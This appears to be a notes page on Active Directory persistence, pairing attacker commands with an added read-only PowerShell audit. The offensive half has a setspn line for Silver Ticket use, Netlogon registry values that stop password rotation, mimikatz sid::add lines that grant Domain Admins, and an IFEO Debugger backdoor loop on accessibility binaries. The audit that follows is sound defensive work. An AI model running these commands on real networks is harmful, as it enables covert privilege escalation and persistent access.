Set an SPN on a user account to provide a way to regain the password to an account after it has been changed.
Example
setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname
- Create Silver Ticket
- Extend the lifetime past the default 30 days
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1
Stops the Netlogon service from changing a machine’s password
HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge
Sets how often the machine's password is rotated (default 30 days)
Reference: https://adsecurity.org/?page_id=1821
mimikatz sid::patch
mimikatz sid::add /sam:karl.watkins /new:"Domain Admins"
mimikatz sid::add /sam:"Domain Users" /new:"Domain Admins"
Image File Execution Options (IFEO)
# For each accessibility binary, create its IFEO key and set a Debugger value,
# which Windows launches in place of the binary.
$bins = @("sethc.exe", "utilman.exe", "osk.exe", "Magnify.exe", "Narrator.exe", "DisplaySwitch.exe", "AtBroker.exe")
foreach ($binname in $bins) {
    New-Item -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname"
    New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname" -Name "Debugger" -Value 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("Follow @cptjesus on twitter")'
}
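
A read-only audit of the IFEO and Netlogon registry values listed above, as an added example that is not part of the original page. The function names are hypothetical, and the 30-day threshold is the default stated above.

```powershell
# Added example: read-only check of the registry locations discussed on this page.
# Run in an elevated PowerShell session on the host being reviewed.

function Get-IfeoDebuggerFinding {
    # Binary list copied from the page's IFEO snippet.
    param([string[]]$Binaries = @("sethc.exe", "utilman.exe", "osk.exe", "Magnify.exe",
                                  "Narrator.exe", "DisplaySwitch.exe", "AtBroker.exe"))
    $base = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
    foreach ($bin in $Binaries) {
        $key = Join-Path $base $bin
        if (-not (Test-Path -LiteralPath $key)) { continue }
        # A Debugger value on an accessibility binary is reported for review.
        $dbg = (Get-ItemProperty -LiteralPath $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{ Check = "IFEO Debugger"; Item = $bin; Value = $dbg }
        }
    }
}

function Get-NetlogonPasswordFinding {
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters"
    $p = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
    if ($null -eq $p) { return }
    # DisablePasswordChange = 1 stops machine password rotation.
    if ($p.DisablePasswordChange -eq 1) {
        [pscustomobject]@{ Check = "Netlogon"; Item = "DisablePasswordChange"; Value = 1 }
    }
    # A rotation interval above the 30-day default is reported for review.
    if ($null -ne $p.MaximumPasswordAge -and $p.MaximumPasswordAge -gt 30) {
        [pscustomobject]@{ Check = "Netlogon"; Item = "MaximumPasswordAge"; Value = $p.MaximumPasswordAge }
    }
}

$findings = @(Get-IfeoDebuggerFinding) + @(Get-NetlogonPasswordFinding)
if ($findings.Count -eq 0) { "No findings." } else { $findings | Format-Table -AutoSize -Wrap }
```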